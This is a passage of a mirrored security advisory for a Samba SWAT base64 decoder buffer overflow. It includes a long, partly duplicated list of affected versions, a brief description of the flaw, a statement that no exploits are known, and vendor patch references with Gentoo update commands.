- Sun Solaris 7.0_x86
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 7.0
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0
- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
- Wirex Immunix OS 6.2
Samba Samba 2.0.7
+ Caldera OpenLinux 2.3
+ Caldera OpenLinux 2.3
+ Conectiva Linux 6.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Conectiva Linux ecommerce
+ Debian Linux 2.3 sparc
+ Debian Linux 2.3 sparc
+ Debian Linux 2.3 powerpc
+ Debian Linux 2.3 powerpc
+ Debian Linux 2.3 alpha
+ Debian Linux 2.3 alpha
+ Debian Linux 2.3
+ Debian Linux 2.3
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Debian Linux 2.2
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 7.0
+ Progeny Debian 1.0
+ Progeny Debian 1.0
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i686
+ RedHat Linux 7.0 i686
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0
+ RedHat Linux 7.0
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ SCO eDesktop 2.4
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO eServer 2.3.1
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ 550 4100R
+ Sun Cobalt RaQ 550 4100R
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR 3500R
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
+ Trustix Secure Linux 1.1
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
+ Wirex Immunix OS 6.2
Samba Samba 2.0.6
+ Red Hat Linux 6.2
+ Red Hat Linux 6.2
+ RedHat Linux 6.2 sparcv9
+ RedHat Linux 6.2 sparcv9
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.2 alpha
+ Sun Cobalt RaQ4 3001R
Samba Samba 2.0.5
- Caldera OpenLinux 2.3
- Caldera OpenLinux 2.3
- SCO eServer 2.3.1
Samba Samba 2.0.4
+ Debian Linux 2.1
+ RedHat Linux 6.0
+ RedHat Linux 6.0
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 i386
+ RedHat Linux 4.2
+ RedHat Linux 4.2
Samba Samba 2.0.3
Samba Samba 2.0.2
Samba Samba 2.0.1
Samba Samba 2.0 .0
Red Hat Fedora Core2
Red Hat Fedora Core1
Conectiva Linux 9.0
Conectiva Linux 8.0
Samba Samba 3.0.5

- 不受影响的程序版本

Samba Samba 3.0.5

- 漏洞讨论

It has been reported that Samba Web Administration Tool (SWAT) is affected by a base64 decoder buffer overflow vulnerability. This issue is due to a failure of the application to properly validate buffer boundaries when copying user-supplied input into a finite buffer.

Successful exploitation of this issue will allow a remote, unauthenticated attacker to execute arbitrary code on the affected computer with the privileges of the affected process; Samba typically runs with superuser privileges.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Conectiva has released advisory CLA-2004:854 to provide Kernel updates to address this and other issues for Conectiva 8 and 9. Please see the referenced advisory for further details regarding obtaining and applying appropriate updates.

OpenPKG has released an advisory (OpenPKG-SA-2004.033) dealing with this issue. Please see the referenced advisory for more information.

Conectiva Linux has released advisory CLA-2004:851 dealing with this issue. Please see the referenced advisory for more information.

Red Hat has released advisory RHSA-2004:259-23 and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Tinysofa Linux has released advisory TSSA-2004-014 dealing with this issue. Please see the referenced advisory for more information.

SuSE Linux has released advisory SUSE-SA:2004:022 along with fixes dealing with this issue. Please see the referenced vendor advisory for more information.

Mandrake has released advisory MDKSA-2004:071 dealing with this issue. Please see the referenced advisory for more information.

Netwosix Linux has released advisory LNSA-#2004-0015 along with an upgrade dealing with this issue. Please see the referenced advisory for more information.

Trustix Secure Linux has released advisory TSL-2004-0039 to address this, and other issues. Please see the referenced advisory for further information.

Gentoo has released fixes for this issue that may be applied with the following commands:
emerge sync
emerge -pv ">=net-fs/samba-3.0.5"
emerge ">=net-fs/samba-3.0.5"

Gentoo has released an updated errata advisory (GLSA 200407-21:02) to correct the list of affected and non-affected versions. Please see the attached advisory for further information.

RedHat has released advisories FEDORA-2004-284, and FEDORA-2004-285 to address this and other issues in RedHat Fedora Core 1 and 2 respectively. Please see the references advisories for further information.

The vendor has released an upgrade dealing with this issue.


Samba Samba 2.2.3 a

Samba Samba 2.2.5

Samba Samba 2.2.7 a

Samba Samba 2.2.8 a

Samba Samba 3.0.2 a

Samba Samba 3.0.2

Samba Samba 3.0.3

Samba Samba 3.0.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站